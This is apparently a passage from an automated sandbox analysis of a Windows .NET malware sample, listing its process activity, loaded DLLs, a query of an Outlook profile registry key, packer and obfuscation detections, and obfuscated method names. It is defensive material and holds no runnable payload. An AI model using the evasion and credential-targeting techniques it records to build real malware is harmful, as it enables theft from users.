                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --time-ticks-at-unix-epoch=-1747189763577284 --launch-time-ticks=160482786 --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=5428 /prefetch:1Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1468133567.0000000003594000.00000004.00000800.00020000.00000000.sdmp, nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1472588568.0000000005350000.00000004.08000000.00040000.00000000.sdmp, nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1468133567.000000000380C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1468133567.0000000003594000.00000004.00000800.00020000.00000000.sdmp, nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1472588568.0000000005350000.00000004.08000000.00040000.00000000.sdmp, nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1468133567.000000000380C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1477131675.0000000006430000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1477131675.0000000006430000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38bf620.1.raw.unpack, NsreGSOuS0ac1UN1Ui5.cs.Net Code: Type.GetTypeFromHandle(PNoaqNiyEa6Y4FkreIK.IkLArUPbXH(16777356)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(PNoaqNiyEa6Y4FkreIK.IkLArUPbXH(16777255)),Type.GetTypeFromHandle(PNoaqNiyEa6Y4FkreIK.IkLArUPbXH(16777285))})
                    .NET source code contains potential unpacker
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, Asgrjz.cs.Net Code: Execute System.AppDomain.Load(byte[])
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38670f8.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38670f8.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38670f8.5.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.3594520.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.3594520.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.3594520.4.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.6430000.10.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.6430000.10.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.6430000.10.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.6430000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.6430000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.3b12660.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.5ce0000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.5ce0000.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.3b12660.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1468133567.0000000003B12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1476454354.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1458694868.0000000002476000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: nEnq-0023HHHDDJKSS1000025.pif.exe PID: 892, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeCode function: 0_2_053E6441 push esp; iretd 0_2_053E644D
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.5750000.7.raw.unpack, m5G8W2xpShIRVMUe6md.csHigh entropy of concatenated method names: 'S6LxOVAYcn', 'pRaxic7P0s', 'J7HxJhWqkc', 'jWdxdPthcO', 'rMJx2jNrRe', 'DLDxPcmhp5', 'zL4xcWP7Cv', 'l97xoKOR4S', 'FeAx981YMX', 'mI8xDHg9qP'
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38bf620.1.raw.unpack, NsreGSOuS0ac1UN1Ui5.csHigh entropy of concatenated method names: 'UP9dqCHjVHrOBLM4EgS', 'IEa75MHUS2mtAdsRuRx', 'XDNi222xIV', 'vh0ry9Sq2v', 'SCyiQxVFjF', 'cZbi9BuTfH', 'PRTiqIrlSO', 'Bp0iDKLY9Z', 'aaQARCVbbW', 'dv4O5sRnVb'
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38bf620.1.raw.unpack, p6Bw6vl6D6eBr9hXf3Y.csHigh entropy of concatenated method names: 'tQElqIduGE', 'IOllDdAK3j', 'Cq6l0mUOCB', 'YGJxrdBwkXi7NbJyM6a', 'oUjZVvBnsppODwe10Ap', 'RTHlXf1KEq', 'e1LlhewsTs', 'iF0latRDBg', 'bvHlfUDZH5', 'AH0lpHPYN5'
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38bf620.1.raw.unpack, KCM2IXpNuFgbJMEpmNx.csHigh entropy of concatenated method names: 'WFSpgOVEmu', 'p7rpyYsOXd', 'B7a24gBryhkonmL7Sjw', 'PDDIHMBg7TKlL9t62Rh', 'e5fpjYkdE7', 'w7rpU3HIJG', 'NRTsNjBMFvSrP8rmCoD', 'l2surcBRK23fAUvL0f8'
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38bf620.1.raw.unpack, lbUQnwiLTKRFe4W10JK.csHigh entropy of concatenated method names: 'FFginj1jCE', 'JIdiziGdP5', 'Nac7FLCXZh', 'WCM7xUsyqE', 'xli7T8gkIG', 'd727kxYnW4', 'Rxt7tZ6aRa', 'J8o76xIDcs', 'Ekn7s9QdMH', 'HRX7XqUFSU'
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38bf620.1.raw.unpack, WWA7q4lnd1JnbK0ve21.csHigh entropy of concatenated method names: 'HD5OkVGmh3', 'b7hOtcZwH4', 'Ea6O6VZquQ', 'guTOsDMAnc', 'vaBOXfSPtc', 'rLCOhdDunm', 'iJyOax2GdP', 'NkLOfnDsd2', 'EEcOpfIW03', 'htfOlIRxmw'
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38bf620.1.raw.unpack, m5G8W2xpShIRVMUe6md.csHigh entropy of concatenated method names: 'S6LxOVAYcn', 'pRaxic7P0s', 'J7HxJhWqkc', 'jWdxdPthcO', 'rMJx2jNrRe', 'DLDxPcmhp5', 'zL4xcWP7Cv', 'l97xoKOR4S', 'FeAx981YMX', 'mI8xDHg9qP'
                    Source: 0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.38bf620.1.raw.unpack, fSIVHX7hSoyKQahjqrJ.csHigh entropy of concatenated method names: 'AIwPaiamMd', 'O6APfiDqiM', 'qotPpyo3Z6', 'QfrPlcwxC6', 'GWWPO3L4Rm', 'ij0PIMFFHr', 'gg2Pi2nnmR', 'EKd7N0cEwe', 'plfP7Ejm6E', 'jT3PJKEH6t'
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
